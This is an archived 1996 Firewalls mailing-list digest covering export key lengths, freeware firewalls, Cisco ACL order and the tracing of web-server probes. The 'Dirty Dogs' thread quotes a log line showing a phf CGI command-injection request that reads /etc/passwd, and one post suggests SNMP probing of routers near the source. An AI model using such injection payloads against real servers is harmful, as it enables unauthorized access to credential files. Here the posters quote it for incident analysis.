firewalls@GreatCircle.COM In-Reply-To: <01BB6F1F.52A2F060@ckostick.sed.csc.com> from "Chris Kostick" at Jul 11, 96 11:51:37 am X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Several students cracked the SSL RC4-40 implementation in about 30 hours with borrowed cycles on computers around their schools. SSL uses a slick salting mechanism to make brute force attacks like this more difficult. However, *any* bad guy worth their salt can steal the compute time to do this in university labs, badly secured companies, etc. The Blaze, Rivest, Diffie, et al paper made some estimates for raw rc4-40 based on hardware time & cost. Ian Goldberg & David Wagner came up with highers estimates for the rc4[md5(key+salt)] used in ssl, because md5 doesn't work easily on the very low end fpga systems that they were using. The Wagner Goldberg paper is entitled 'Architectural Considerations for Cryptanalytic hardware' http://www.cs.berkeley.edu/~iang/isaac/hardware/ Adam Chris Kostick wrote: | > Reading CISCO's online technology briefs for the forthcoming (is there a | > firm release date ?) IOS 11.2 which includes network level encryption services | > (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm) | > functionally it's exactly what we need to setup various distinct user groups | > - however, according to Diffie, Blaze, Rivest et al | > (http://www.bsa.org/policy/encryption/cryptographers.html) | > the exportable key length (40 bits) is far too small, even the domestic | > length (according to them) (56 bits) doesn't cut it. | | This one has always bothered me a little - '40 bits is way too small.' There are | 1,099,511,627,776 possible combinations of a key. Given today's technology it is | crackable using brute force methods. But, who is going to do that? A person | or persons have to have *a lot* of CPU power to crack it in a reasonalble amount | time unless they get really really lucky. A government can do it fairly | fast I imagine. Larger corporations like IBM , Microsoft, DEC, Citicorp, | DOW, Exxon, etc............. can probably supply the horsepower needed. Are | these people your adversaries? If not, then your risk is not as great as people | like Diffie, Blaze and Rivest make it out to be. -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Thu Jul 11 19:04:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19661 for firewalls-outgoing; Thu, 11 Jul 1996 18:49:00 -0700 (PDT) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA19625 for ; Thu, 11 Jul 1996 18:48:49 -0700 (PDT) Received: by relay.ashton.csc.com; id VAA10815; Thu, 11 Jul 1996 21:48:39 -0400 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.12/8.6.9) id VAA17727; Thu, 11 Jul 1996 21:49:31 -0400 From: Chris Kostick Message-Id: <199607120149.VAA17727@mccoy.ashton.csc.com> Subject: Re: CISCO network level encryption & key lengths To: adam@homeport.org (Adam Shostack) Date: Thu, 11 Jul 1996 21:49:31 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199607120236.VAA13959@homeport.org> from "Adam Shostack" at Jul 11, 96 09:36:42 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Several students cracked the SSL RC4-40 implementation in > about 30 hours with borrowed cycles on computers around their schools. > SSL uses a slick salting mechanism to make brute force attacks like > this more difficult. However, *any* bad guy worth their salt can > steal the compute time to do this in university labs, badly secured > companies, etc. This is kind of the point I'm driving at. Any bad guy won't do this. The bad guys in question here aren't trying to look at love letters. They want to steal some serious information if they're going to the trouble of attacking an encryption code. Therefore, I don't think the bad guys would risk using other peoples machines to do this. Now, I go back to my original statement. The people you have to worry about are the big players; governments and large corporations who have enough assets to try and 'crack' a packet overnight. If that is who you consider your primary threat then 40-bit keys suck raw eggs. If not, then I still feel the data in transit is reasonably secure. Feel free to disagree. > > The Blaze, Rivest, Diffie, et al paper made some estimates for > raw rc4-40 based on hardware time & cost. Ian Goldberg & David Wagner > came up with highers estimates for the rc4[md5(key+salt)] used in ssl, > because md5 doesn't work easily on the very low end fpga systems that > they were using. The Wagner Goldberg paper is entitled 'Architectural > Considerations for Cryptanalytic hardware' > http://www.cs.berkeley.edu/~iang/isaac/hardware/ Thank you for the pointer. -- chris From firewalls-owner Thu Jul 11 19:19:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21100 for firewalls-outgoing; Thu, 11 Jul 1996 19:05:22 -0700 (PDT) Received: from procion.ulpgc.es (procion.ulpgc.es [193.145.133.21]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA21072 for ; Thu, 11 Jul 1996 19:05:04 -0700 (PDT) Received: by procion.ulpgc.es; id AA24556; Fri, 12 Jul 1996 03:02:25 +0100 Received: from cic.teleco.ulpgc.es by fobos.ulpgc.es (5.65/Ultrix4.2-C) Received: from by cic (4.1/SMI-4.1) Message-Id: <9607120303.AB18589@cic> Comments: Authenticated sender is From: "Miki Vazquez" Organization: Univ. de Las Palmas de Gran Canaria To: Firewalls@GreatCircle.COM Date: Fri, 12 Jul 1996 02:58:56 +000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Proxy Server For WinNT Reply-To: mvazquez@cic.teleco.ulpgc.es X-Mailer: Pegasus Mail for Windows (v2.40) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi I suppost that it's a FAQ, but what do you thing about Proxy for NT? I'm probing WinGate... but.. I want know most option. From firewalls-owner Thu Jul 11 19:34:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22466 for firewalls-outgoing; Thu, 11 Jul 1996 19:22:08 -0700 (PDT) Received: from darkwing.pacific.net.sg (darkwing.pacific.net.sg [203.120.89.89]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA22426 for ; Thu, 11 Jul 1996 19:21:54 -0700 (PDT) Received: (qmail-queue invoked from smtpd); 12 Jul 1996 02:18:00 -0000 Received: from darkwing.pacific.net.sg (203.120.89.89) Date: Fri, 12 Jul 1996 10:18:00 +0800 (SST) From: Ng Pheng Siong To: BVE cc: firewalls@greatcircle.com Subject: Re: Dirty Dogs In-Reply-To: <9607120022.AA13435@omsk.yourtown.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jul 1996, BVE wrote: > > whois -h rs.internic.net 152.169.232.0 > No match for "152.169.232.0". > > ...and: > > whois 152.169.232.0 > No match for "152.169.232.0". 152.169 is a class B address, so do 'whois 152.169.0.0'. home/ngps/PI:$ whois 152.169.0.0 Advanced Network & Services, Inc. (NET-ANS-BNET14) 100 Clearbrook Rd Elmsford, NY 10523 Netname: ANS-BNET14 Netnumber: 152.169.0.0 Coordinator: Mackey, Bruce (BM814) Mackey@AOL.COM 703-453-4414 Alternate Contact: ANS Network Operations Center (ANS-NOC) noc@ans.net 1-800-456-6300 Domain System inverse mapping provided by: HP81.PROD.AOL.NET 192.203.190.18 OPS01.OPS.AOL.COM 152.163.80.11 DNS-AOL.ANS.NET 198.83.210.28 Cheers. - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From firewalls-owner Thu Jul 11 19:49:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA23951 for firewalls-outgoing; Thu, 11 Jul 1996 19:36:07 -0700 (PDT) Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA23913 for ; Thu, 11 Jul 1996 19:35:51 -0700 (PDT) Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id TAA04199; Thu, 11 Jul 1996 19:38:19 -0700 (PDT) From: Mark Allyn 206-860-9454 Message-Id: <199607120238.TAA04199@mark.allyn.com> Subject: Re: Extending Financial Applications And Protecting via a Firewall To: howzit@worldnet.att.net Date: Thu, 11 Jul 1996 19:38:18 -0700 (PDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <31E4821F.3D7@worldnet.att.net> from "Syer A. Caudill" at Jul 11, 96 00:25:03 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In response to questions about secure timekeeping stuff being done over the public Internet web - - - - - Hello: Best solution is to use the secure socket layor (SSL) that Netscape has allready built into their web browsers. You would need the domestically available 128 bit key version; not the exportable 40 bit key version that has been decrypted via brute force mathematical analysis. With a properly set up secure server (Netscape's is about $1000, I think, and there are cheaper solutions available elsewhere) all of your transactions over the web are encryted and safe from tapping. Then set up password authentication on your web server. Since you will be using SSL, the username and password will be passed under cover over the net and cannot be sniffed. On this server, along with the SSL capable web server, install the Oracle SQL Net client software. Don't install the database itself here. That should be installed on another machine on the company's internal network. Actually, best here to install the newer Oracle Secure SQL Net on both the web server and the internal machine with the Oracle database. Be carefull though, the Oracle database must be of a certain revision (7.3, I believe), in order for secure SQL net to work. Install this secure dedicated web server on its own lan segment segment between two filters. The outer filter should allow only http traffic from the outside to touch the web server. No mail, telnet, ftp, or anything else. The inside filter should allow only SQL Net traffic to go from the web server to the inside network and only to the one machine that has the database. Nothing else should be allowed through the inside filter except for possibly telnet FROM the INSIDE to the web server to facilitate maintenace on it, although best is to do all maintenance on the box itself from the console. Probably best to have both boxes in the same (secured) physical location to facilitate maintenance. Good Luck! Mark Allyn From firewalls-owner Thu Jul 11 21:34:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA27022 for firewalls-outgoing; Thu, 11 Jul 1996 21:20:04 -0700 (PDT) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA26465 for ; Thu, 11 Jul 1996 21:18:29 -0700 (PDT) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) Received: from c0038.isid.co.jp(133.158.252.1) by mycroft via smap (V1.3mjr) Received: from success.isid.co.jp (root@c0033.isid.co.jp [133.158.251.1]) by isidgw.isid.co.jp (8.6.12+2.5W/3.3Wb-96030120) with ESMTP Received: from c0480.isid.co.jp (c1837.isid.co.jp [133.158.136.7]) by success.isid.co.jp (8.6.12+2.5W/3.3Wb-96030120) with SMTP Date: Fri, 12 Jul 1996 13:04:09 +0900 Message-Id: <199607120404.NAA06629@success.isid.co.jp> X-Sender: akato@isid.co.jp X-Mailer: Windows Eudora Pro Version 2.1.2J Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-2022-JP" To: "Joseph M. Flahiff" From: Akira KATO Subject: Re: Freeware Cc: "'Firewalls Listserv'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:07 96/07/11 -0700, Joseph M. Flahiff wrote: > What are people's experiences with freeware products for firewalling, > proxy, etc.? Good, bad, dangerous? Although I have no _experiences_ with this kind of stuff, It might be a good idea for you to know the following URL and check it out. http://www.etl.go.jp/etl/People/ysato@etl.go.jp/DeleGate/ In the mailing-list with several hundreds of people who are using and contributing this freeware, I have never heard the big problem beyond the minor bugs. Sincerely, Akira KATO Information Services International-Dentsu, LTD. System Integration Consulting Dept. tel:+81-422-72-4893 fax:+81-422-72-4903 http://www.etl.go.jp:8080/etl/People/akato@etl.go.jp/ From firewalls-owner Thu Jul 11 21:49:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA00935 for firewalls-outgoing; Thu, 11 Jul 1996 21:30:55 -0700 (PDT) Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA00785 for ; Thu, 11 Jul 1996 21:30:16 -0700 (PDT) Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id OAA29495; Fri, 12 Jul 1996 14:25:10 +1000 (EST) Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id OAA03656; Fri, 12 Jul 1996 14:27:52 +1000 (EST) Message-Id: <199607120427.OAA03656@shekel.firstpac.com.au> Subject: Re: Dirty Dogs To: bve@omsk.yourtown.com (BVE) Date: Fri, 12 Jul 1996 14:27:50 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9607120022.AA13435@omsk.yourtown.com> from "BVE" at Jul 11, 96 08:22:55 pm X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717 X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB From: Matthew Keenan X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BVE wrote this... > Brian is correct. The access logs of the WWW servers I've used log > all attempts, whether or not they are successful. We also were > probed: > 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 - > This attempt failed, as we did not have a phf CGI script. > Interestingly, here is the whois: > > whois -h rs.internic.net 152.169.232.0 > No match for "152.169.232.0". try whois -h rs.internic.net 152.169 [snip] > ...and nslookup: > > nslookup 152.169.232.79 > Server: omsk.yourtown.com > Address: 205.246.66.7 > Name: [152.169.232.79] > Address: 152.169.232.79 try % nslookup Default Server: foo.bar.baz Address: 257.257.257.257 > set type=any > 169.152.in-addr.arpa. Server: foo.bar.baz Address: 257.257.257.257 Non-authoritative answer: 169.152.in-addr.arpa origin = hp81.prod.aol.net mail addr = postmaster.hp81.prod.aol.net serial = 2 refresh = 3600 (1 hour) retry = 300 (5 mins) expire = 86400 (1 day) minimum ttl = 3600 (1 hour) Authoritative answers can be found from: [server listings snipped] > server hp81.prod.aol.net. Default Server: hp81.prod.aol.net Address: 192.203.190.18 > ls -d 169.152.in-addr.arpa. [hp81.prod.aol.net] *** Can't list domain 169.152.in-addr.arpa.: Query refused > now that is a bit more informative but no zone dump unfortuately... but considering the low serial (2), it probably has very little in the way of records if any... you might want to traceroute to the address and try snmp probing the routers closest to the target address. > This person seems to have covered their tracks pretty well. Any ideas on > tracking them?? not really, they seemed to have come from aol (assuming there is no source routing). and since there would seem to be very few records for this subnet (that i can find anyway), it would also probably be from a dial in address. Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Thu Jul 11 22:08:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA02269 for firewalls-outgoing; Thu, 11 Jul 1996 21:54:49 -0700 (PDT) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA29095 for ; Thu, 11 Jul 1996 21:25:04 -0700 (PDT) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) Received: from lighthouse.homeport.org(205.136.65.198) by mycroft via smap (V1.3mjr) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id XAA14177; Thu, 11 Jul 1996 23:17:39 -0500 From: Adam Shostack Message-Id: <199607120417.XAA14177@homeport.org> Subject: Re: CISCO network level encryption & key lengths To: ckostick@ashton.csc.com (Chris Kostick) Date: Thu, 11 Jul 1996 23:17:38 -0500 (EST) Cc: adam@homeport.org, firewalls@greatcircle.com In-Reply-To: <199607120149.VAA17727@mccoy.ashton.csc.com> from "Chris Kostick" at Jul 11, 96 09:49:31 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Kostick wrote: | > Several students cracked the SSL RC4-40 implementation in | > about 30 hours with borrowed cycles on computers around their schools. | > SSL uses a slick salting mechanism to make brute force attacks like | > this more difficult. However, *any* bad guy worth their salt can | > steal the compute time to do this in university labs, badly secured | > companies, etc. | | This is kind of the point I'm driving at. Any bad guy won't do this. The | bad guys in question here aren't trying to look at love letters. They want | to steal some serious information if they're going to the trouble of | attacking an encryption code. Therefore, I don't think the bad guys would | risk using other peoples machines to do this. Now, I go back to my original | statement. The people you have to worry about are the big players; | governments and large corporations who have enough assets to try and 'crack' | a packet overnight. If that is who you consider your primary threat then | 40-bit keys suck raw eggs. If not, then I still feel the data in transit | is reasonably secure. Feel free to disagree. I see your point, and disagree somewhat. In the case of SSL v2, there is substantial known plaintext at the start of a message; as such, bad guys don't have to expose the sensitive information they want; they only need to put the start of the message out there, and mail themselves any keys that seem like hits. Bad guys will steal cycles for Crack, they'll steal them for other attacks. 40 bits is not so pitifully weak as say, rot-13, but is too weak to protect information of value that you're going to spend cpu cycles encrypting. (Incidentally, the way rc4 works, using a 40 bit key takes exactly as long as using a 128 bit key, since all the keys are permuted into a 256(?) bit key in an initial step.) The US government needs to reform its export laws; its own NAS panel says so. This is because 40 bit keys are too weak for business use. | > because md5 doesn't work easily on the very low end fpga systems that | > they were using. The Wagner Goldberg paper is entitled 'Architectural | > Considerations for Cryptanalytic hardware' | > http://www.cs.berkeley.edu/~iang/isaac/hardware/ | | Thank you for the pointer. sure. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Jul 12 12:11:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00886 for firewalls-outgoing; Fri, 12 Jul 1996 11:21:15 -0700 (PDT) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA00840 for ; Fri, 12 Jul 1996 11:20:58 -0700 (PDT) Received: from aurora.cdev.com by relay5.UU.NET with SMTP Message-Id: Received: from cdi2p10.cdev.com by aurora.cdev.com id SMTP-00131e5e551018737; Fri, 12 Jul 96 00:40:35 -0500 X-Sender: djs3wn39@aurora.cdev.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 21:11:02 -0700 To: jshaw@dttus.com From: Donald.J.Smith@cdev.com (Donald J Smith) Cc: FireWalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer believes John said: >Date: Wed, 10 Jul 96 09:00:00 CST >From: "John M. Shaw" >Subject: Newbie Cisco Access-List Question > > > > Assuming 2 lines with same source, s-mask, dest, and d-mask: > > access-list 101 permit tcp source s-mask dest d-mask gt 1023 > access-list 101 deny tcp source s-mask dest d-mask eq 2049 > > Which one takes precedence? > Does the order matter? > > Any help would be greatly appreciated? Order matters. Read from top to bottom. First matching rule covers routing questions. So switch the order and you get a set of rules that denies tcp eq 2049, but allows all other tcp > 1023. Donald J Smith Network Security Engineer @Computing Devices International design in security @ the begining & ease_of_use != A*(1/Data_Security) (my opinions are mine and so are the spelling errors ;-) From firewalls-owner Fri Jul 12 12:19:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05896 for firewalls-outgoing; Fri, 12 Jul 1996 12:05:18 -0700 (PDT) Received: from gater3.sematech.org (GATER3.SEMATECH.ORG [192.73.53.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA05865 for ; Fri, 12 Jul 1996 12:05:07 -0700 (PDT) Received: from GATEV4.SEMATECH.ORG Received: from claven.sematech.org (claven.sematech.org) Received: from webba (webba.eng.sematech.org) by claven.sematech.org with SMTP Date: Fri, 12 Jul 1996 14:03:21 -0500 From: Andy Webb Subject: Re: Dirty dogs To: firewalls@greatcircle.com Message-id: <31E6A179.2883@swinc.com> Organization: Simpler-Webb, Inc. MIME-version: 1.0 X-Mailer: Mozilla 3.0b4Gold (WinNT; I) Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Well, folks, whether or not you try to contact genstar.net or zilker.net is > one issue, but I would definately do SOMETHING, at least on your own systems. > Both of these log snippets indicate a SUCCESSFUL use of this attack. Especially > now that you've published your vulnerability to the world, I hope you're > disabling the script! > > Howard Hantman > Manager, Technology Integration > Corporate ITS > Raytheon Company > Actually, zilker.net is Zilker Internet Park - an ISP in Austin, TX. It is run by John Quarterman and Smoot-Carl Mitchel who would probably be very happy to provide you with a little chasing and log info. regards Andy Webb awebb@swinc.com From firewalls-owner Fri Jul 12 12:46:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04187 for firewalls-outgoing; Fri, 12 Jul 1996 11:50:10 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA04139 for ; Fri, 12 Jul 1996 11:49:53 -0700 (PDT) Received: from hidata.com by relay4.UU.NET with SMTP Received: by hidata.com; id AA21147; Fri, 12 Jul 96 09:03:29 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Fri, 12 Jul 1996 09:03:25 -0700 Message-Id: <199607121603.JAA04290@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Freeware Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you don't know what you're doing with a freeware package, or if the package has not been updated recently, it is dangerous. I believe the tis-fwtk is the best freeware firewall package available. However it has not been updated for years (v1.3), and does not contain updates to support new versions of platform O.S. For example, the telnet proxy does not work on all OS's, and just don't use the fwtk httpd, use CERNs. Also, not all OS versions are fully supported. If the firewall happens to compile O.K. on 'SuperUNIX v6.0', you may not be completely sure what the binaries are going to do when they run. You fix the obvious bugs yourself by hacking the source code. That is freeware software. No service, no support,no 'bet-your-company-on-it' ability. In some cases you do have a tempermental mailing-list to query, but it may take you weeks to get the thing running exactly right. Personally I have better things to do with my life than hack a specific proxy, in a specific software package, for a specific OS, for specific hardware, which all of course will be obsolete in a few months. (Old: Gopher/Archie/Veronica, MIP/386/486/VAX CPUs, BSD UNIX. New: Chat, RealAudio, Encrypted links, new authentication packages, Solaris/SVR4/FreeBSD/Linux, Java, Active-X, plug-ins, etc.) If you want something to bet your company on, have a professional install a commercial supported package. At least if something goes wrong, you have a place to point to, other than only yourself. My 2 cents. Bill Stout P.S. - An alpha version of Fwtk (v2.0alpha) is available. At 09:07 AM 7/11/96 -0700, you wrote: >What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? > >TIA > >Joseph Flahiff >Moss Bay Group, Inc. >Advisors in Technology Management > > > <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... -------------------------------------------------------------------------------- From firewalls-owner Fri Jul 12 13:05:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA01376 for firewalls-outgoing; Fri, 12 Jul 1996 11:27:44 -0700 (PDT) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA01308 for ; Fri, 12 Jul 1996 11:27:27 -0700 (PDT) Received: from phoenix.iss.net by relay3.UU.NET with SMTP Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA02534 for ; Fri, 12 Jul 1996 10:51:49 -0400 Message-Id: <199607121451.KAA02534@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@greatcircle.com Date: Fri, 12 Jul 1996 10:52:58 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: binary sniffer Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering, are there any sniffers that show packets in binary rather than hex? I would like to have something akin to Sun's "snoop" where on one side of the screen I can see the actual packets and on the other side I can see the ASCII translation. Yes, I can pipe the output to something that will convert the HEX to binary, but I would just rather have a program that will show the packets in binary form to start with. Thanks, Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Fri Jul 12 13:05:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02998 for firewalls-outgoing; Fri, 12 Jul 1996 11:41:50 -0700 (PDT) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA02943 for ; Fri, 12 Jul 1996 11:41:31 -0700 (PDT) Received: from gatekeeper.ray.com by relay1.UU.NET with ESMTP Received: (mailer@localhost) by gatekeeper.ray.com (8.7.5/8.7.3) id HAA03370; Fri, 12 Jul 1996 07:57:00 -0400 Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Fri Jul 12 07:56:52 1996 Received: by eo.ray.com (5.0/SMI-SVR4) Date: Fri, 12 Jul 1996 07:56:29 -0400 From: hhantman@eo.ray.com (Howard Hantman) Message-Id: <9607121156.AA25593@eo.ray.com> To: bve@omsk.yourtown.com Subject: Re: Dirty Dogs Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since there have been several messages questioning my claim of the reported attacks being successful, let me clarify. Yes, the HTTP server will log all requests whether sucessful or not. BUT, the last two numbers in the log entry specify the successful or unsuccessful status of that request and the number of bytes tranferred. In the example quoted below (which failed) the status is in the 400's (failure) and the bytes transferred is "-" (ie. zero). In the original posts, the requests had a status of 200 (success) and an actual byte count indicating the size of the information returned. Those requests did succeed and anyone else who is seeing these log entries should look at the status condition or better yet check their cgi-bin directory to see if they have the misreant utility. Howard Hantman Manager, Technology Integration Corporate ITS Raytheon Company > From: bve@omsk.yourtown.com (BVE) > To: firewalls@GreatCircle.COM > Subject: Re: Dirty Dogs > > > from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll > <9607111219.AA25794@eo.ray.com> > >> Well, folks, whether or not you try to contact genstar.net or zilker.net > >> is > >> one issue, but I would definately do SOMETHING, at least on your own > >> systems. > >> Both of these log snippets indicate a SUCCESSFUL use of this attack. > >> Especially > >> now that you've published your vulnerability to the world, I hope you're > >> disabling the script! > > > >From: Brian Murrell > > > >Not necessarily. Those look similar to the log files on our server, > >however if one looks at the corresponding errors file (for the Netscape > >server) one will notice error messages regarding the access and how the > >file could not be found. > > Brian is correct. The access logs of the WWW servers I've used log all > attempts, whether or not they are successful. We also were probed: > > 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 - > > This attempt failed, as we did not have a phf CGI script. Interestingly, here > is the whois: > > whois -h rs.internic.net 152.169.232.0 > No match for "152.169.232.0". > > The InterNIC Registration Services Host contains ONLY Internet Information > (Networks, ASN's, Domains, and POC's). > Please use the whois server at nic.ddn.mil for MILNET Information. > > ...and: > > whois 152.169.232.0 > No match for "152.169.232.0". > > Please be advised that this whois server only contains DOD Information. > All INTERNET Domain, IP Network Number, and ASN records are kept in > the Internet Registry, RS.INTERNIC.NET. > > ...and nslookup: > > nslookup 152.169.232.79 > Server: omsk.yourtown.com > Address: 205.246.66.7 > > Name: [152.169.232.79] > Address: 152.169.232.79 > > ----------------------------- > > This person seems to have covered their tracks pretty well. Any ideas on > tracking them?? > > Bill Van Emburg > Quadrix Solutions, Inc. > (bve@quadrix.com) > (http://yourtown.com) > "You do what you want, and if you didn't, you don't" > From firewalls-owner Fri Jul 12 13:25:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08372 for firewalls-outgoing; Fri, 12 Jul 1996 12:30:04 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08357 for ; Fri, 12 Jul 1996 12:29:51 -0700 (PDT) Received: from sic.se by relay4.UU.NET with ESMTP Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id OAA00694 for ; Fri, 12 Jul 1996 14:55:29 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607121457.AA42616@pamela.sic.se> Date: Fri, 12 Jul 1996 14:57:42 +0100 From: "Stefan Berg" To: firewalls@GreatCircle.com Subject: Re: Freeware Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My experience with freeware or any other firewall software for that matter is that it very much depends on _configuration_ rather than the quality of the software. I mean, what's the use of a super_duper_mega_expensive_and_great firewall if you don't know hot to set it up in a secure fashion? I think one key to successful firewalling is good planning combined with organization and policy. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 